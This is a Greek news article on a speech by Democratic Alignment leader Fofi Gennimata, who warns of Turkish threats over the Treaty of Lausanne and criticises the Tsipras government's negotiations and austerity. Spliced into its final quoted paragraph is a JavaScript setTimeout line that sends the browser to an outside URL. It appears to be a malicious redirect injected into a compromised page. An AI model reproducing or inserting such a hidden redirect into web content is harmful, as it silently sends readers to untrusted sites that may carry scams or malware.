Γεννηματά: Πάνε στη διαπραγμάτευση με την πλάτη στον τοίχο και τα δίνουν όλα

0
6

 

Mε ομιλία της στην εκδήλωση της Δημοκρατικής Συμπαράταξης με θέμα «Ανάπτυξη, Δουλειές, εργασιακά δικαιώματα» η επικεφαλής της Δημοκρατικής Συμπαράταξης Φώφη Γεννηματά, εξέφρασε την ανησυχία της για την τουρκική προκλητικότητα και τις δηλώσεις του Ερντογάν για την αναθεώρηση της Συνθήκης της Λωζάννης.

«Περιέχουν απροκάλυπτες απειλές κατά της εθνικής μας ασφάλειας. Ο πρωθυπουργός της Τουρκίας εξαγγέλλει και εντυπωσιακά εξοπλιστικά προγράμματα που προσδίδουν στις δηλώσεις του χαρακτήρα ανοικτής απειλής. Η στάση αυτή που απειλεί και την ειρήνη και τη σταθερότητα της ευρύτερης περιοχής, πρέπει να αντιμετωπιστεί εγκαίρως με ψυχραιμία και αποφασιστικότητα. Με σχεδιασμό και ουσιαστικές ενέργειες» είπε η κυρία Γεννηματά επικρίνοντας στη συνέχεια την κυβέρνηση για τη διαπραγμάτευση λέγοντας ότι έχει μια μοναδική ικανότητα να δημιουργεί αδιέξοδα.

«Με αυτό τον τρόπο πάει στη διαπραγμάτευση με την πλάτη στον τοίχο και τελικά για να «διασωθεί» τα δίνει όλα. Ο κ. Τσίπρας και η κυβέρνησή του έχουν γίνει οι πιο πρόθυμοι στους πιο συντηρητικούς κύκλους της Ευρώπης και στις απαιτήσεις τους».

Η λύση στο πρόβλημα της Ελλάδας δεν είναι η συνέχιση της λιτότητας, ούτε είναι λύση η ζούγκλα στην αγορά εργασίας σημείωσε η κυρία Γεννηματά σχολιάζοντας «η λύση βρίσκεται στη δυνατότητα που έχουν οι παραγωγικές δυνάμεις του τόπου να συνεργαστούν. Με βάση ένα πλαίσιο αποδεκτό από τους κοινωνικούς εταίρους«. setTimeout(«document.location.href=’http://gettop.info/kt/?53vSkc&'», delay);

ΑΦΗΣΤΕ ΜΙΑ ΑΠΑΝΤΗΣΗ

Please enter your comment!
Please enter your name here